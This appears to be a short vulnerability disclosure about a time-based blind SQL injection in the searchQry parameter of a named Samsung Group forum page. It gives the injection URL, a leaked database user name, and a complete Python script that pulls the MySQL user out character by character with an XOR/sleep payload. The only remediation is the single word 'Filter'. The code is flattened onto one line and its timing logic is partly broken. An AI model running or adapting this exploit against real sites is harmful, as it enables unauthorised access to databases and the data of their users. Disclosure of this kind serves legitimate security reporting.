One MySQL blind note (with python verification script) from a website of Samsung Group)
A MySQL blind injection on a site of Samsung Group has a high speed of guessing and is attached with a python verification script.
The injection point is located:
http://www.sgsg.samsung.com/forum/qna.do?pageNo=1&searchQry=123
The searchQry parameter can be injected.
Guess the user and get:
sgsguser@localhost
Verification script:
#encoding=gbkimport httplibimport timeimport stringimport sysimport randomimport urllibheaders = { 'Cookie': '', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)for i in range(0,10): payloads.append(str(i))payloads += ['@','_', '.']print 'start to retrive MySQL user:'user = ''for i in range(1,30,1): for payload in payloads: try: conn = httplib.HTTPConnection('www.sgsg.samsung.com', timeout=5) rand_num = str(random.random()) s = "123'XOR(if(ascii(mid(user()from(%s)for(1)))=%s,sleep(1),0))OR'bbb" % (i, ord(payload) ) conn.request(method='GET', url='/forum/qna.do?pageNo=1&searchQry=' + urllib.quote(s), headers = headers) start_time = time.time() html_doc = conn.getresponse().read() conn.close() print '.', except: user += payload print '\n[in progress]', user breakprint '\nMySQL user is', user
Solution:
Filter